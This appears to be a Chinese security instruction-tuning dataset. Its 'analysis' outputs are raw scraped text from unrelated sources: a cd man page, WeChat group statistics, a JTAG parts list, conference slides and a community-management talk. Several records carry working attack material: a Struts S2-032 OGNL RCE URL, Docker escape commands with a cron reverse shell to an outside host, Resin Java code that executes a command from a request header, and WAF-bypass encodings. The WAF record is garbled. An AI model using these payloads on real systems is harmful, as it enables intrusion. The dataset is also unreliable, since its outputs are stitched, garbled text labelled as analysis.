(contact->bio != NULL){ free(contact->bio); } puts(\"How long will the bio be?\"); if (fgets(input, 4, stdin) == NULL){ puts(\"Couldn't read length.\"); return; }; length = strtoul(input, NULL, 10); if (length > 255){ puts(\"Bio must be at most 255 characters.\"); return; } contact->bio = (char *)malloc(le", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncd === 切换用户当前工作目录 ## 概要 ```shell cd [-L|[-P [-e]]] [dir] ``` ## 主要用途 - 切换工作目录至`dir`其中`dir`的表示法可以是绝对路径或相对路径 - 若参数`dir`省略则默认为使用者的shell变量`HOME` - 如果`dir`指定为`~`时表示为使用者的shell变量`HOME``.`表示当前目录`..`表示当前目录的上一级目录 - 环境变量`CDPATH`是由冒号分割的一到多个目录你可以将常去的目录的上一级加入到`CDPATH`以便方便访问它们如果`dir`以`/`开头那么`CDPATH`不会被使用 - 当`shopt`选项`cdable_vars`打开时如果`dir`在`CDPATH`及当前目录下均不存在那么会把它当作变量读取它的值作为要进入的目录 ## 参数 dir可选指定要切换到的目录 ## 选项 ```shell -L 默认值如果要切换到的目标目录是一个符号连接那么切换到符号连接的目录 -P 如果要切换到的目标目录是一个符号连接那么切换到它指向的物理位置目录 - 当前工作目录将被切换到环境变量OLDPWD所表示的目录也就是前一个工作目录 ``` ## 返回值 返回状态为成功除非无法进入指定的目录 ## 例子 ```shell cd # 进入用户主目录 cd / # 进入根目录 cd ~ # 进入用户主目录 cd .. # 返回上级目录若当前目录为/则执行完后还在/\"\"..\"为上级目录的意思 cd ../.. # 返回上两级目录 cd !$ # 把上个命令的参数作为cd参数使用 ``` 关于切换到上一个工作目录的说明 ```shell cd - # 命令会首先显示要切换到的目标目录然后再进入 cd ${OLDPWD} # 命令会直接切换到上一个工作目录 ``` 关于`CDPATH` ```shell # 设置桌面文件夹作为CDPATH的值 CDPATH='~/Desktop' # 假设我们接下来要演示涉及到的路径~和~/Desktop下没有test3文件夹现在新建它们 mkdir ~/test3 mkdir ~/Desktop/test3 # 进入~目录 cd ~ # 进入test3目录 cd test3 # 执行后显示~/Desktop/test3并进入该目录而不是~目录的test3目录 # 如果CDPATH存在值那么优先在CDPATH中查找并进入第一个匹配成功的如果全部失败那么最后尝试当前目录 ``` 关于`cdable_vars` ```shell # 打开选项 shopt -s cdable_vars # 假设当前路径以及CDPATH没有名为new_var的目录 new_var='~/Desktop' # 尝试进入 cd new_var # 关闭选项 shopt -u cdable_vars ``` ### 注意 1. 该命令是bash内建命令相关的帮助信息请查看`help`命令 2. 建议您在编写脚本的过程中如有必要使用`cd`命令时请增加必要的注释以用于提醒阅读者当前工作目录以免出现诸如`找不到文件`这类问题的发生", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n在v2ex看到一个项目给女朋友生成一个聊天年度报告 https://github.com/myth984/wechat-report 尝试做了一个后觉得挺好玩想到之前做的小8机器人加了很多安全群能否给这些群统计一下做个报 告呢 数据提取 说干就干原项目使用ios导出数据的功能获取数据感觉有点麻烦小8机器人运行在windows的Pc微 信上直接从Pc微信把数据脱出来就行了 PC微信的数据库是sqlite但是加密了参考 https://bbs.pediy.com/thread-251303.htm 从内存中提 取 key 进行解密就能得到数据库了 微信群摸鱼报告 把开源项目的前端简单修改了一下为小8加的所有群都生成了一次 微信群聊年度报告  例: hacking8安全信息流交流群的报告 https://i.hacking8.com/wechat-report/17715724893@chatroo m 获取报告 如果群内加了小8机器人可以在群内输入 @A' 小8 报告 即可获得一份群内专属报告链接 安全圈微信群摸鱼报告 既然小8加的都是些安全群是否能根据群消息分析安全圈微信群的摸鱼报告呢 大数据分析安全圈已经有很多珠玉在前的报告例如 404notfound 师傅的以博客数据的分析我分析 了2018-2020年青年安全圈450个活跃技术博客和博主 gainover 师傅的以微博数据为主的分析安 全圈有多大也许就这么大这次尝试用微信数据进行分析看看安全圈微信群的摸鱼现状~ 注 下面分析采用的数据是小8机器人加的群总计有81个不能反映真实情况不要当真 哪一天说话最多 小8推出并加群的时候才11月份所以统计的也就是这两个月的最小值 161 ,最大值 6972 平均值在 2139 看到12月10日最多超出第二名几乎一倍这一天发生了什么 往回看聊天记录才知道12月9日晚上log4j2的漏洞预警发布到了12月10日exp已经流传开了各 种复现成功的图片和payload 爆发流传所以12月10日应该可以看作是log4j2漏洞爆发的第一天 大家一般都在哪个时间段说话 可以看到两个高峰一个是11点一个是16点说话比较多这个时间正是人一天中精力最旺盛的时 候从21点到0点的时候也有一个上升的坡度且发言数都大于平均值说明在安全人员在晚上也会 进行一些活动 安全人员喜欢哪个语言 php 还是不是安全人员最喜欢的语言怀着这样的疑问进行了统计先对发言的内容进行分词 jieba再和下面的数据取交集 结果如下 programs = [\"asp\", \"php\", \"java\", \"python\", \"go\", \"golang\", \"node\", \"javascript\", \"js\", \"rust\", \".net\", \"c#\", \"csharp\", \"c\", \"ruby\",\"nim\"] java和go的讨论最多php在第三位 哪个安全研究人员id被最多讨论 通过以下字典可以汇总安全研究人员的id 去除了一些字典杂质后提及次数大于5统计如下,当然这个数据不能说明什么仅供参考 https://github.com/404notf0und/Security-Data-Analysis-and-Visualization https://raw.githubusercontent.com/jiesson/MyPYP/be9496150c1f23aaf294ca2bdbbfcb90 0ad6731a/CTF/%E5%AD%97%E5%85%B8/fuzzDicts-master/userNameDict/sec_id.txt 安全id 提及次数 chybeta 99 l1nk3r 49 aliyun 33 anquanke 27 hacking8 19 orange 15 seebug 14 mars 14 Zedd 12 gh0st 10 hone 10 gh0stkey 9 neargle 9 love 9 Wing 8 payloads 8 z3r0yu 8 boy-hack 8 white 7 space 7 phith0n 6 LoRexxar 6 online 6 hexo 5 leavesongs 5 Cytosine 5 anyu 5 标签云图 大家更喜欢讨论哪家安全公司 因为没有公开的数据统计安全公司做词库所以就百度了一下网络安全的公司选了几个不是很全 统计次数高的top10如下: companies = [\"360\", \"启明星辰\", \"华为\", \"深信服\", \"绿盟\", \"亚信\", \"奇安信\", \"新华三\", \"安恒\", \"天融信\", \"山石\", \"知道创宇\", \"恒安嘉新\", \"阿里\", \"腾讯\",\"蚂蚁\",\"长亭\", \"星澜\", \"字节跳动\", \"百度", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJTAGulator JTAGulator Bill-of-Materials Bill-of-Materials Bill-of-Materials HW B, Document 1.0, April 19, 2013 HW B, Document 1.0, April 19, 2013 HW B, Document 1.0, April 19, 2013 Build Quantity Build Quantity 1 Item Quantity Reference Manufacturer Manuf. Part # Distributor Distrib. Part # Description Unit Price Per Build Extended 1 2 C1, C2 Kemet C1206C103K5RACTU Digi-Key 399-1234-1-ND Capacitor, 0.01uF ceramic, 10%, 50V, X7R, 1206 $0.160 2 $0.32 2 14 C3, C6, C9, C11, C12, C13, C14, C15, C17, C18, C19, C20, C21, C22 Kemet C1206C104K5RACTU Digi-Key 399-1249-1-ND Capacitor, 0.1uF ceramic, 10%, 50V, X7R, 1206 $0.100 14 $1.40 3 1 C4 Yageo CC1206KRX7R9BB102 Digi-Key 311-1170-1-ND Capacitor, 1000pF ceramic, 10%, 50V, X7R, 1206 $0.130 1 $0.13 4 1 C5 Yageo CC1206KRX7R9BB471 Digi-Key 311-1167-1-ND Capacitor, 470pF ceramic, 10%, 50V, X7R, 1206 $0.130 1 $0.13 5 1 C7 Kemet T491A106M016AS Digi-Key 399-3687-1-ND Capacitor, 10uF tantalum, 20%, 16V, size A $0.410 1 $0.41 6 2 C8, C10 Kemet T491A475K016AT Digi-Key 399-3697-1-ND Capacitor, 4.7uF tantalum, 10%, 16V, size A $0.350 2 $0.70 7 1 D1 Kingbright WP59EGW Digi-Key 754-1232-ND LED, Red/Green Bi-Color, T-1 3/4 (5mm) $0.330 1 $0.33 8 1 L1 TDK MPZ2012S221A Digi-Key 445-1568-1-ND Inductor, Ferrite Bead, 220R@100MHz, 3A, 0805 $0.120 1 $0.12 9 1 P1 Hirose Electric UX60-MB-5S8 Digi-Key H2960CT-ND Connector, Mini-USB, 5-pin, SMT w/ PCB mount $1.380 1 $1.38 10 5 P2, P3, P4, P5, P6 TE Connectivity 282834-5 Digi-Key A98336-ND Connector, Terminal Block, 5-pin, side entry, 0.1 P $1.730 5 $8.65 11 3 P7, P8, P9 3M 961210-6404-AR Digi-Key 3M9460-ND Header, Dual row, Vertical header, 2x5-pin, 0.1 P $0.700 3 $2.10 12 1 Q1 Fairchild MMBT3904 Digi-Key MMBT3904FSCT-ND Transistor, NPN, 40V, 200mA, SOT23-3 $0.150 1 $0.15 13 5 R1, R2, R3, R4, R10 Any Any Digi-Key P10KECT-ND Resistor, 10k, 5%, 1/4W, 1206 $0.100 5 $0.50 14 1 R5 Any Any Digi-Key P470ECT-ND Resistor, 470 ohm, 5%, 1/4W, 1206 $0.100 1 $0.10 15 1 R6 Any Any Digi-Key P270ECT-ND Resistor, 270", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWietze Beukema (@wietze) D3FC0N, August 2022 SAVE THE ENVIRONMENT (VARIABLE) HIJACKING LEGITIMATE APPLICATIONS WITH A MINIMAL FOOTPRINT D3F C0N @Wietze  Sr Threat Hunter on CrowdStrikes OverWatch Elite team  Based in London, UK  Previously presented at BSides London, MITRE ATT&CK EU Community, SANS DFIR HELLO WORLD, WHO DIS? 2 @WIETZE D3F C0N DLL HIJACKING Tricking a (legitimate/trusted) application into loading an arbitrary DLL Legitimate DLLs Trusted program Evil DLL 3 @WIETZE D3F C0N Attacker- controlled folder Original folder 4 @WIETZE DLL HIJACKING: COMMON TYPES DLL SIDE-LOADING Move vulnerable EXE, put next to malicious DLL DLL SEARCH ORDER HIJACKING Put malicious DLL in folder searched before legit DLL DLL SUBSTITUTION Replace the original DLL with a malicious one D3F C0N Attacker- controlled folder Original folder 5 @WIETZE DLL HIJACKING: LESS COMMON TYPES PHANTOM DLL HIJACKING Create malicious DLL in location that is searched for, but normally does not exist WINSXS HIJACKING Manipulate Windows Side-by-Side infrastructure INPUT-BASED HIJACKING Manipulate the command line, Windows Registry, etc. D3F C0N WELL DOCUMENTED WELL RESEARCHED WELL DETECTED 6 @WIETZE D3F C0N 7 @WIETZE VARIABLES D3F C0N  (Dynamic) variable that can be used by running programs  Can be used in:  Command shells (e.g. %VAR% on Windows, $VAR on Unix)  As well as regular processes (e.g. getenv(\"VAR\") in C)  Typically stored as (ASCII) string 8 @WIETZE ENVIRONMENT VARIABLES D3F C0N ENVIRONMENT VARIABLES: A BRIEF HISTORY An environment variable is a special case of a replaceable parameter. If the SET command is used in the form SET name=value to add an environment variable to the system's environment block, the string value will be substituted for the string %name% wherever the latter is encountered during the interpretation of a batch file. This capability is available only in versions 2.x, 3.1, and 3.2. 70 80 90 00 10 20 1978: Version 7 Unix introduces environment variables 1982: PS DOS 2.0 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHITCON 2019 - Ta-Lun Yen (es) 1 Trust in Apples secret garden: Exploring & Reversing Apples Continuity Protocol HITCON 2019 - Ta-Lun Yen (es) 2 Outline  Motivation  Introduction to Continuity Protocol  iCloud, APNS, iMessage  Continuity  Previous Research  Software Stack  Protocol  Remarks HITCON 2019 - Ta-Lun Yen (es) 3 About me  Working as DevOps + Fullstack  Independent Security Research  Tinkering / Hacking devices or new things  Security in communication process HITCON 2019 - Ta-Lun Yen (es) 4 Motivation  Study on how Apple actually implements security  Shed light into Apples secret garden  Make iOS device more usable on non-macOS device HITCON 2019 - Ta-Lun Yen (es) 5 Motivation  Responsible disclosure? Bug bounty?  No apparent vulnerability found yet  No bug bounty for such domain HITCON 2019 - Ta-Lun Yen (es) 6 Continuity HITCON 2019 - Ta-Lun Yen (es) 7 Continuity  Move seamlessly between your devices with Handoff, Universal Clipboard, iPhone Cellular Calls, SMS/MMS messaging, Instant Hotspot, Continuity Camera, AirDrop, Apple Pay, and Auto Unlock.  Heavily relies on BLE and iMessage / iCloud  Most things wont work without Bluetooth HITCON 2019 - Ta-Lun Yen (es) 8 Why Continuity  Instant Hotspot (macOS + iOS)  Open Wi-Fi menu  Wait for device to appear  Click on devices name  Not-so-Instant Hotspot (!macOS + iOS)  Grab your phone & enable hotspot  Scan for Wi-Fi stations  It usually works, but sometimes it wont  New association only when Hotspot page is active HITCON 2019 - Ta-Lun Yen (es) 9 Contuniuty  ...Continuity takes advantage of technologies like iCloud  ...encryption of the individual messages, which is similar to how iMessage is encrypted... HITCON 2019 - Ta-Lun Yen (es) 10 iCloud, APNs, IDS, iMessage HITCON 2019 - Ta-Lun Yen (es) 11 iCloud  Debuted around end of 2011  Est. 850M users  Multiple Services  Backup, Device Locater, Messaging  Push Service (APNS) HITCON 2019 - Ta-Lun Yen (es) 12 APNs  Apple Push Notification Service  Device ID  APNs addr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Prime 1 > https://download.vulnhub.com/prime/Prime_Series_Level-1.rar 靶场IP`192.168.32.212` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -p 1-65535 -sV 192.168.32.212 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 04:57 EDT Nmap scan report for 192.168.32.212 Host is up (0.00051s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 00:0C:29:5B:79:B9 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds ``` 访问80端口 ![image-20220907165744607](../../.gitbook/assets/image-20220907165744607.png) 爆破目录 ``` (rootkali)-[/tmp] # dirb http://192.168.32.212/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Sep 7 04:58:27 2022 URL_BASE: http://192.168.32.212/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.32.212/ ---- + http://192.168.32.212/dev (CODE:200|SIZE:131) + http://192.168.32.212/index.php (CODE:200|SIZE:136) ==> DIRECTORY: http://192.168.32.212/javascript/ + http://192.168.32.212/server-status (CODE:403|SIZE:302) ==> DIRECTORY: http://192.168.32.212/wordpress/ ---- Entering directory: http://192.168.32.212/javascript/ ---- ==> DIRECTORY: http://192.168.32.212/javascript/jquery/ ---- Entering directory: http://192.168.32.212/wordpress/ ---- + http://192.168.32.212/wordpress/index.php (CODE:301|SIZE:0) ==> DIRECTORY: http://192.168.32.212/wordpress/wp-admin/ ==> DIRECTORY: http://192.168.32.212/wordpress/wp-content/ ==> DIRECTORY: http://192.168.32.212/wordpress/wp-includes/ + http://192.168.32.212/wordpress/xmlrpc.php (CODE:405|SIZE:42) ---- Entering directory: http://192.168.32.212/javascript/jquery/ ---- + http://192.168.32.212/javasc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# S2-032 Remote Code Execution VulnerablityCVE-2016-3081 [中文版本(Chinese version)](README.zh-cn.md) Affected Version: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) References: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://www.cnblogs.com/mrchang/p/6501428.html ## Setup Execute the following command to start the Struts2 2.3.28 ``` docker compose up -d ``` After the container is running, visit `http://your-ip:8080` that you can see an example page. ## Exploitation Theres a feature embedded in Struts 2 that lets the \"!\" (bang) character invoke a method other than execute. It is called Dynamic Method Invocation aka DMI. A simple way to use DMI is to provide HTTP parameters prefixed with `method:`. For example in the URL it could be `/category.action?method:create=foo`, the parameter value is ignored. The method name of DMI will be evaluated by OGNL expression engine, which would cause the RCE vulnerability. Visit following URL to trigger the `id` command: ``` http://your-ip:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n在WAF子 Who am I IdMayIKissYou 01 WAF Nginx-lua-waf Modsecurity web的WAF这 02 WAF 多只http://www.miku.com/ 1.php?id=1%20and1=1 用多情情 只TCP/IP用到 情WAF下情 WAF bypass Know It Then Bypass It 03 WAF BYPASS 上BYPASS WAFWAF /这WAF上 你上个这 上上 上这 上WAF上bypassWAF 这 04 WAF BYPASS Puzzle到 bypass 到对发WAF情到对mysql情sqlserver情oracle情 postgresmysql到对子情我出 我WAFselect from[好select from子] 1select id from table 09 0A 0B 0C 0D A0 20 只也用 2select id from table /**/ /*!50000*/ /*!*/只也用 3select id from table select-.1,select!.1,select~. 1,select(1),select`host`,select` select1,select@1 只也用 4select id from table select{x version()}, select.`corp`.corp_id from corp;() WAF 我情select from为_ 情 1 时会发 http://wooyun.org/bugs/wooyun-2010-0121291 我sql时会发情们我 []select[][]from[]时 会 1):下1a-z,A-Z_ 2):下2a-z,A-Z_ 3):下3a-z,A-Z 4):下4a-z,A-Z_ 1 时会发 http://wooyun.org/bugs/wooyun-2010-0121291 1 时会发 http://wooyun.org/bugs/wooyun-2010-0121291 http://zone.wooyun.org/content/13270 人上WAF WEBbypass WEB多WAF bypass情asp+IIS aspx+IIS php+apache java+tomcat http情 WAFhttp中http大情大 bypass WAF 好上好 WAFbypass这 WEBbypass 1IIS +asp(%) 那%情中s%elect情WAF s%elect情iis+asp中情select 2IIS+aspx(%u) Iis多unicode情子select那 unicode情s%u006c%u0006ect情那IIS select情WAF情 s%u006c%u0006ect情这bypass 3IIS+asp|aspx HTTP Parameter Polution WEBbypass 4apache method wafmethod可情子GET POST情apache多 可情method HELLO那情 情WAF http://www.wooyun.org/bugs/wooyun-2013-024599 WEBbypass 5php+apache boundary PHPmultipart data情boundary情 成情子下boundary----aaaa,123456情php ----aaaa,过WAF 情那情BYPASS 2 windowsbypass http://wooyun.org/bugs/wooyun-2010-0115175 我 1用我 id=1 and 1=1 2用我 id=1 a%nd 1=1 3用我 id =1 %u0061nd 1=1 我WAF 2 windowsbypass http://wooyun.org/bugs/wooyun-2010-0115175 %u0061 %uxxxx就65535,and 我asciiand![] 65535 %00aa%00e2 2 windowsbypass http://wooyun.org/bugs/wooyun-2010-0115175 bypass以 http://blog.sina.com.cn/s/blog_85e506df0102vo9s.html Author by yuange widechar情widechar iis情 情widechar 那 Web上 好 WAFBypass WAF发WAF情WAF 很子 1用WAF 没我 2用WAF 说 3用WAF 4用WAF BUG 5用 WAFBypass WAF 还WAFWAF只用想情最的 们有[IP情IP情情 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一判断是否在docker容器里 首先我们需要先判断是否在docker环境里常用的两个检测方式 目前来说这两种检测方式还是比较有效的其他检测方式如检测mountfdisk -l查看硬盘 判断PID 1的进程名 等也可用来辅助判断 二配置不当引发的docker逃逸 2.1 docker remote api未授权访问 漏洞简述docker remote api可以执行docker命令docker守护进程监听在0.0.0.0可直接调用API来操作 docker 通过docker daemon api 执行docker命令 漏洞利用 A新运行一个容器挂载点设置为服务器的根目录挂载至/mnt目录下 B在容器内执行命令将反弹shell的脚本写入到/var/spool/cron/root C本地监听端口获取对方宿主机shell 2.2 docker.sock挂载到容器内部 场景描述简单来说就是docker in docker在docker容器中调用和执行宿主机的docker将docker宿主机的 docker文件和docker.sock文件挂载到容器中具体为 检查/.dockerenv文件是否存在 检查/proc/1/cgroup内是否包含\"docker\"等字符串 sudo dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375 #列出容器信息效果与docker ps一致 curl http://<target>:2375/containers/json #启动容器 docker -H tcp://<target>:2375 ps -a sudo docker -H tcp://10.1.1.211:2375 run -it -v /:/mnt nginx:latest /bin/bash echo '* * * * * /bin/bash -i >& /dev/tcp/10.1.1.214/12345 0>&1' >> /mnt/var/spool/cron/crontabs/root 漏洞测试 A在容器中找到docker.sock B在容器查看宿主机docker信息 C运行一个新容器并挂载宿主机根路径 D在新容器的/test 目录下就可以访问到宿主机的全部资源接下来就是写入ssh密钥或者写入计划任务获取 shell 2.3 docker 高危启动参数 docker run --rm -it \\ -v /var/run/docker.sock:/var/run/docker.sock \\ -v /usr/bin/docker:/usr/bin/docker \\ ubuntu \\ /bin/bash root@95a280bc5a19:/# find / -name docker.sock /run/docker.sock docker -H unix:///var/run/docker.sock info docker -H unix:///var/run/docker.sock run -it -v /:/test ubuntu /bin/bash ls -al /test docker中存在一些比较高危的启动命令给予容器较大的权限允许执行一些特权操作在一定的条件下可以导 致容器逃逸 特权模式--privileged 使用特权模式启动的容器时docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部获取对整个 宿主机的文件读写权限此外还可以通过写入计划任务等方式在宿主机执行命令 漏洞测试 A通过特权模式运行一个容器 B在容器内查看磁盘文件 C将/dev/sda1 挂载到新建目录 D将计划任务写入到宿主机 docker run --rm -it --privileged -v /:/soft --cap-add=SYS_ADMIN --net=host --pid=host --ipc=host ubuntu /bin/bash sudo docker run -itd --privileged ubuntu:latest /bin/bash fdisk -l mkdir /test mount /dev/sda1 /test E开启nc监听成功获取宿主机反弹回来的shell 挂载敏感目录-v /:/soft 漏洞测试 A将宿主机root目录挂载到容器 B模拟攻击者写入ssh密钥 C利用私钥成功登录获取宿主机权限 相关启动参数存在的安全问题 Docker 通过Linux namespace实现6项资源隔离包括主机名用户权限文件系统网络进程号进程间通 讯但部分启动参数授予容器权限较大的权限从而打破了资源隔离的界限 echo '* * * * * /bin/bash -i >", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n回显 Resin 4.x 在resin 4.X中跟一下如何获取response对象 com.caucho.server.http.HttpRequest#handleRequest com.caucho.server.http.AbstractHttpRequest#getResponseFacade 返回 response 对象 所以如果能获取到AbstractHttpRequest对象并调用该对象的getResponseFacade方法即可获取 response对象 获取AbstractHttpRequest对象继承关系如下: CTRL + H 基于 TcpSocketLink com.caucho.network.listen.TcpSocketLink 通过反射从 _currentRequest 获取到request对象 测试发现实际上获取到的request对象为HttpRequest类型而HttpRequest继承自 AbstractHttpRequest 则可以调用getResponseFacade()方法获取response对象 回显思路 通过调用TcpSocketLink.getCurrentRequest()获取ProtocolConnection对象实际 HttpRequest 通过调用其父类(AbstractHttpRequest)的getResponseFacade方法获取response对象 通过反射调用reponse对象的getWriter方法获取PrintWriter对象 通过PrintWriter对象的write方法写入回显内容 代码实现 // 获取TcpSocketLink Class对象 Class tcpSocketLinkClazz = Thread.currentThread().getContextClassLoader().loadClass(\"com.caucho.network.lis ten.TcpSocketLink\"); // 通过反射调用getCurrentRequest方法 Method getCurrentRequestM = tcpSocketLinkClazz.getMethod(\"getCurrentRequest\"); Object currentRequest = getCurrentRequestM.invoke(null); // 从父类(AbstractHttpRequest)中获取_responseFacade字段 Field f = currentRequest.getClass().getSuperclass().getDeclaredField(\"_responseFacade\"); f.setAccessible(true); // 获取response对象 Object response = f.get(currentRequest); // 获取getWriter方法 Method getWriterM = response.getClass().getMethod(\"getWriter\"); // 调用getWriter获取Writer对象 基于 ServletInvocation com.caucho.server.dispatch.ServletInvocation#getContextRequest 获取ContextRequest对象 实际获取到的为HttpServletRequestImpl对象 com.caucho.server.http.HttpServletRequestImpl#_response 获取到HttpServletRequestImpl对象后通过_response字段获取到response对象 运行时截图 Writer writer = (Writer)getWriterM.invoke(response); // 获取getHeader方法 Method getHeaderM = currentRequest.getClass().getMethod(\"getHeader\", String.class); // 调用getHeader获取到通过需执行的命令cmd String cmd = (String)getHeaderM.invoke(currentRequest, \"cmd\"); // 执行命令 Scanner scanner = (new Scanner(Runtime.getRuntime().exec(cmd).getInputStream())).useDelimiter(\"\\\\A\"); // 写入命令执行结果并回显 writer.write(scanner.hasNext() ? sca", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbusing Certificate Transparency Or how to hack Web Applications before Installation Hanno Böck https://hboeck.de/ 1 HTTPS 2 Certificate Authorities 3 Can we trust Certificate Authorities? 4 No 5 CAs are bad, we need to get rid of them Popular Infosec opinion 6 Reality Nobody has a feasible plan how to replace CAs 7 Improving the CA system 8 Baseline Requirements 9 HTTP Public Key Pinning (HPKP) 10 Certificate Authority Authorization (CAA) 11 Certificate Transparency 12 Public logs 13 CT Details Merkle Hash Trees, Signed Certificate Timestamps (SCT), Signed Tree Head (STH), Precertificates, Monitors, Gossip, ... 14 Certificate logging Next year (April) logging will be required for all certificates 15 Today 16 The CA watchdog Everyone can check logs for suspicious activity 17 18 19 20 https://crt.sh 21 Certificate Transparency is also a data source 22 Feed of new host names 23 Let's talk about something else 24 Web applications 25 Installers 26 No authentication! 27 Old: Google dorking web installers 28 New idea There is a time window between uploading files and completing the installer 29 Remember: We have a feed of newly created host names 30 Attack 31 Monitor CT logs, extract host names 32 Check hosts for common installers 33 If installer found: Install the application 34 Upload a plugin with code execution backdoor 35 Revert installation 36 Database credentials Use external database host 37 Demo 38 Challenges Logged certificates aren't immediately public (around 30 minutes) 39 Optimizations Instead of checking sites once one could check them multiple times 40 Numbers 5000 Wordpress installations within three months. 500 x Joomla, 120 x Nextcloud, 70 x Owncloud. 41 Protection 42 Installers need authentication 43 Challenge Application programmers want easy installations 44 Security tokens Webapp creates token file, user has to read token 45 Vendors Drupal, Typo3, Owncloud ... no reaction 46 Vendors Wordpress, Nextcloud, Serendipity participated in cross-vendor disc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n那些年 知识星球运营分享 曹将 个人简介 曹将 畅销书PPT炼成记作者 世界500强企业总部培训负责人 自媒体平台详情  公众号曹将 21万读者  微博曹将PPTao 52万读者  知乎曹将 10万关读者 知识星球简介 星球 曹将和朋友们 成员数 5000+ 核心成员 88 星球天数 1290 星球运营人数 1.5 巨坑 我是谁 WHO AM I 2016年 一次意外 2018年 转型 2019年 问题 2020年 清晰 有些话 只想跟你少数人说 转岗 时间不够用 招助理 我们的定位 到底是什么 WHO AM I KP 关键合作伙伴 KA 关键活动 VP 价值主张 CR 客户关系 CS 目标客群 CH渠道 KR 关键资源 C$ 成本结构 R$ 收益结构 商业模式地图 谁可以帮我 要做什么 我有什么 解决客户什么痛点 怎样和对方打交道 我能帮助到谁 如何宣传自己 我要付出什么 我会得到什么 商业模式地图 KP 关键合作伙伴 KA 关键活动 VP 价值主张 CR 客户关系 CS 目标客群 CH渠道 KR 关键资源 C$ 成本结构 R$ 收益结构 谁可以帮我 要做什么 我有什么 怎样和对方打交道 我能帮助到谁 如何宣传自己 我要付出什么 我会得到什么 1. 知识星球 2. KOL 3. 印象笔记 4. iSlide 5. 得到 6. 数据  1. 拉新 2. 促活 1. 社群学习氛围 2. 免费资源 3. 红包奖励 4. 荣誉打造 5. 专属微信群 1. 职场效率提升 2. 找准向少踩坑 1. 评论 2. 问答 3. 核群 4. 发 5. 直播 1. 公众号 2. 微博 3. 知识星球 4. 用户碑分享 作1-5年的职场 1.资 2.星球奖励 3.直播感谢 4.双拉新优惠 星球收 解决客户什么痛点 画完图就够了吗 LONG LONG WAY TO GO 坑一 只靠激情没有激励  奖励1加入精华 ①获奖人数不限 ②获奖频率不限 ③衡量标准评估发帖质量由曹将评价 ④获奖金额每条5元  奖励2一周之星  ①获奖人数1人 ②获奖频率每周一次 ③衡量标准当周点赞量最多 ④获奖内容15元奖励并受邀加入曹将和朋友们精华群  奖励3密圈互动TOP3 ①获奖人数3人 ②获奖频率每月两次 ③衡量标准点赞数 ④获奖内容第一名70元第二名20元第三名10元 并受邀加入曹将和朋友们精华群  奖励4月度之星 ①获奖人数不限 ②获奖频率不限 ③衡量标准综合考虑发帖数量加精数量和点赞量 ④获奖内容100元奖励纸质版职场升级手册1.0一本 并受邀加入曹将和朋友们精华群  奖励5职场加油站最佳分享 ①获奖人数4人 ②获奖频率每月两次 ③衡量标准邀请的讲师被讲师选出的优秀作业3人 ④获奖内容讲师激励200元优秀作业每人30元 我们还在持续丰富我们的奖励池包括但不 限于得到贝iSlide会员金数据会员印 象笔记会员等 坑二 开始倾囊而出后续弹尽粮绝 每天写 一鼓作气再而衰三而竭 每周更新三次 主题式更新 坑三 情怀主义服务情绪主义结束 我要搞线下聚会 我要搞直播 我要做各种训练营 我要做各种兴趣群 我要搭建大家的人脉地图  好累啊 好烦啊 算了 一切围绕目标做 WHAT DO I WANT TO GET! 促活 数量 质量 自下而上 自上而下 引导优质 盘活优质 1. 打卡 2. 日常发 1. 密圈互动 1. 直播课后作业 1. 过往资源合辑 奖励制度 沉淀 目标 行为 子目标 保障 坑四 大锅饭大家散 两种方案 Plan A 30元30元30元 Plan B 70元20元10元 